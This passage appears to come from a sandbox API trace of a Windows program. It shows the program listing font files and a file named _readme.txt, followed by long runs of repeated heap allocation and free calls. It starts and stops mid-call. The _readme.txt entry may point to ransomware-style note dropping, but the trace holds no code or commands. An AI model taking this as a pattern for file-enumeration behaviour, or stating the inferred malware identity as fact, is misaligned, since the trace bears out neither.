lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0090.800] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0090.800] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0090.800] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32da2c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3300420, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.800] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32da2c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3300420, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.800] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.800] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.800] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.800] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.800] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.800] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.800] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.800] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.800] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.800] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.800] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.800] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.800] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.800] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.800] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.800] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.800] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.800] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.800] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.800] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.800] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.800] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.801] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.801] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.801] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.801] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.801] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.801] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.801] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.801] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.801] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.801] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.801] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.801] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.801] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.801] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.801] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.801] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.802] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.803] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.803] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.803] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.803] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.803] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.803] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.803] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.803] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.803] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.803] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.803] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.803] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.803] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.803] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.803] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.803] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.804] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.804] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.805] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.805] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.805] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.805] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.805] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.805] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.805] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.805] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.805] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.805] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.805] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.805] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.805] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.805] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.805] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.805] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.805] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0090.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.805] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99e3968 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.806] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.806] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 